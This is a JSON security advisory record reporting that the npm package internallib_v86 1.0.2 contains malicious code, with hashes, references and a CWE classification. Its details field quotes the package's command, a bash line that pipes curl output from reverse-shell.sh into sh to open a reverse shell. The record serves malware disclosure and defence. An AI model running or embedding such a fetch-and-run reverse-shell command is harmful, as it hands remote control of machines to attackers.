{"id":"MAL-2026-17634","summary":"Malicious code in internallib_v86 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (9ea0c4f9673e1db33b6782ea815e30df5d2420ceff6d7ab920592e70a511bc07)\ninternallib_v86 ships a tiny index.js that exports a function `command` which invokes `/bin/bash -c \"curl https://reverse-shell.sh/... | sh\"` targeting 10.0.19.80:443. Any consumer that requires the package and calls the exported function causes the installer's host to fetch a reverse-shell script from reverse-shell.sh and pipe it to a shell, giving an interactive remote shell on the installer to whoever controls 10.0.19.80. The package name is generic and no legitimate functionality is implemented alongside this behavior.\n","modified":"2026-10-06T04:30:50.497707336Z","published":"2026-10-06T03:56:38Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-10-06T03:56:38Z","sha256":"9ea0c4f9673e1db33b6782ea815e30df5d2420ceff6d7ab920592e70a511bc07","source":"amazon-inspector","versions":["1.0.2"],"id":"IN-MAL-2026-021085","import_time":"2026-10-06T04:22:56.06299981Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v86/v/1.0.2"}],"affected":[{"package":{"name":"internallib_v86","ecosystem":"npm","purl":"pkg:npm/internallib_v86"},"versions":["1.0.2"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"b6d706ba158c1640e22adbcbcd85ff4b4947c9b9f6e45e31d3438a6b1df0a619","tlsh":"b8c0c07786db023af74965e0de15f861b8478c703a3800b0b014405110c3c4d72170ff","path":"index.js"}],"package_integrity":[{"hashes":{"sha1":"9db935edac387698d5855a2196f1c8945322689e","sha512_sri":"sha512-U4Yh3a45DPU1JZR3b4n3nEw7dimjdn9gBiEw5BGhAcenYKVBKilzCzU1RQ6nOmBN26W1vtcUx7aObpyHbjwzbw=="},"filename":"internallib_v86-1.0.2.tgz"}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v86/MAL-2026-17634.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}